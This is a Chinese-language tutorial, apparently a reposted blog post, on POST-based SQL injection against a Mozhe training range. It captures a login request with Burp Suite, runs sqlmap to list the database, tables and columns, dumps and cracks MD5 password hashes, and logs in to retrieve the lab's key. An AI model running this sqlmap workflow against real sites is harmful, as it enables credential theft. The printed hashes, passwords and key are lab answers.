POST型SQL注入教学
這次教學要用到的工具有burpsuite,SQLMAP,瀏覽器
上次我給大家分享的AJE-Windows里面什么工具都有,可以直接裝一個AJE-Windows工具不用一個一個的下,太麻煩
然后這次教學要用到的SQLMAP模塊參數給大家說一下
–current-db //獲取當前使用 的數據庫
–tables 列出指定數據庫中的表
–columns //獲取當前數據庫中當前表的所有列名
–dump //獲取當前數據庫中當前表的所有用戶名和密碼
首先我們打開我們的AJE-Windows,再打開SQLMAP和burpsuite
靶場地址是http://219.153.49.228:45888
我們隨便輸入賬號密碼,然后打開burpsuite開啟攔截包之后點登錄,右鍵把攔截的數據包發送到repeater
右鍵文件復制到桌面
輸入文件名然后點擊保存
然后輸入sqlmap.py -r 這里寫剛剛保存的數據包(拖拽) --current-db回車
好的跑出來了,這個站常用的數據庫名是mozhe_Discuz_StormGroup
然后接下來跑數據庫表名sqlmap.py -r 抓包的文件 -D 該站點用的數據庫名 --tables
跑出來的表名是StormGroup_member
接下來跑表內字段sqlmap.py -r 數據包文件 -D 數據庫名 -T 表名 --columns
跑出來了表內字段name和password,這兩個分別是用戶名的列名和密碼的列名
接下來跑用戶名和密碼sqlmap.py -r 數據包文件 -D 庫名 -T 表名 -C name,password --dump
第一個用戶名是mozhe第二個也是,第一個密碼是356f589a7df439f6f744ff19bb8092c0第二個密碼是
cac346c4e78571439ba96bc5a47c01b6,它用的是MD5加密,第一個解出來是dsan13
我們試試第一個能不能登上去
第一個登陸失敗了試試第二個,第二個解出來密碼是885288
我們登陸試試,登陸成功了,key是mozhe4953564e012470c2374e45919c2
提交key
好的,本次教學就到這里,喜歡我文章的歡迎點贊加關注,再訂閱一下我的專欄,或者加入我專欄,有什么地方寫的不好的歡迎加我QQ3516634930反饋
總結
以上是生活随笔為你收集整理的POST型SQL注入教学的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: JS高级:事件冒泡和事件捕获;
- 下一篇: 自学编程需要注意什么?